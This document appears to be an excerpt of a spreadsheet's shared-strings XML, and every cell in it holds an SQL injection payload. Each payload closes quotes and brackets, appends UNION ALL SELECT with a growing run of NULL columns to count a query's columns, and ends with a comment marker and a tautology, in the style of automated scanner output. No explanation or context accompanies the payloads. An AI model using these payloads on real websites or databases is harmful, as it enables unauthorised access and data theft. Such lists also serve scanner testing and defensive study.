    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "Pihf" = "Pihf</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "LJIL" = "LJIL</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "vGRV" = "vGRV</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "QrGo" = "QrGo</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "ddTm" = "ddTm</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "pHVZ" = "pHVZ</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</si>
  <si>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"QCHf" = "QCHf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</si>
  <si>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"hCco" = "hCco</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "rBMm" = "rBMm</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "PkXq" = "PkXq</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "xpYd" = "xpYd</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "rRqp" = "rRqp</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "dmEP" = "dmEP</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "JgEy" = "JgEy</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "yQxp" = "yQxp</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "iyDm" = "iyDm</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "qrWd" = "qrWd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</si>
  <si>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"OuVk" = "OuVk</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "ykgQ" LIKE "ykgQ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "MAZy" LIKE "MAZy</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "AKQu" LIKE "AKQu</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "OteK" LIKE "OteK</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "LFGo" LIKE "LFGo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "UDKa" LIKE "UDKa</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "bXvv" LIKE "bXvv</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "fgoa" LIKE "fgoa</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "JwIU" LIKE "JwIU</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</si>
  <si>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"GIWr" LIKE "GIWr</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "eTlV" LIKE "eTlV</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "slAb" LIKE "slAb</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "BWFa" LIKE "BWFa</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "OHtN" LIKE "OHtN</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "dqRu" LIKE "dqRu</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "lKwd" LIKE "lKwd</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "ZHcq" LIKE "ZHcq</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "TkVC" LIKE "TkVC</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</si>
  <si>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"TXNg" LIKE "TXNg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</si>
  <si>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"NseJ" LIKE "NseJ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "AdYk" LIKE "AdYk</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "OpIc" LIKE "OpIc</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "wvyt" LIKE "wvyt</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "vzSN" LIKE "vzSN</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "ISQd" LIKE "ISQd</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "vYGK" LIKE "vYGK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "Vaqa" LIKE "Vaqa</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "AWNl" LIKE "AWNl</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</si>
  <si>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"Thwf" LIKE "Thwf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</si>
  <si>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"KkwE" LIKE "KkwE</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "UDTt" LIKE "UDTt</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "mleE" LIKE "mleE</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "ixks" LIKE "ixks</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Bruy" LIKE "Bruy</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Mkhm" LIKE "Mkhm</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "RreT" LIKE "RreT</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "ntzc" LIKE "ntzc</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "bIOm" LIKE "bIOm</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "ppBh" LIKE "ppBh</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</si>
  <si>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"PsLW" LIKE "PsLW</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 7649 = 7649</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 9751 = 9751</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 5823 = 5823</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 2213 = 2213</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 6083 = 6083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</si>
  <si>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( 1719 = 1719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</si>
  <si>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( 4207 = 4207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</si>
  <si>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( 3767 = 3767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</si>
  <si>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( 6779 = 6779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</si>
  <si>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( 9300 = 9300</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  7597 = 7597</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  3866 = 3866</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  1829 = 1829</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  4209 = 4209</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  2930 = 2930</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</si>
  <si>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6875 = 6875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</si>
  <si>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</si>
  <si>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2072 = 2072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</si>
  <si>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6495 = 6495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</si>
  <si>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9007 = 9007</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 4647 = 4647</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7153 = 7153</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 4536 = 4536</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 4725 = 4725</t>
  </si>
  <si>
